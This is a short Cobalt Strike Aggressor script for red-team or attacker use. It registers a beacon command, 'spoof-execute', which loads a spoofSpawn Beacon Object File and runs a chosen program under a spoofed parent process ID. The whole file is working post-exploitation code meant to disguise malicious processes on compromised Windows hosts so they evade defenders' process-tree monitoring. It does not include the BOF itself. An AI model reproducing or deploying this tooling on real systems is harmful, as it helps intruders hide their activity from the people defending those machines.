alias spoof-execute {

    local('$barch $handle $data $temp $program $commandlineargs $args');
	
    if(size(@_) < 3)
    {
        berror($1, "Incorrect usage!");
        berror($1, beacon_command_detail("spoof-execute"));
        return;
    }
	
    $temp = substr($0, strlen("spoof-execute") + 1 + strlen($2) + 1);

    $program = substr($temp, 0, indexOf($temp, ".exe") + 4);
    $commandlineargs = substr($temp, indexOf($temp, ".exe") + 4);
	
    $barch = barch($1);

    $handle = openf(script_resource("dist/spoofSpawn. $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);

    $args = bof_pack($1,"iZZ", $2, $program, $commandlineargs);
    btask($1, "Spawn Process PPID Spoofing by 0x3rhy");
    btask($1, "Execute: $temp");
    beacon_inline_execute($1, $data, "go", $args);

}

beacon_command_register(
    "spoof-execute", 
    "Spawns a process PPID spoofing.", 
    "Synopsis: spoof-execute <ppid> [ABS ProgramPath args]\n"
);
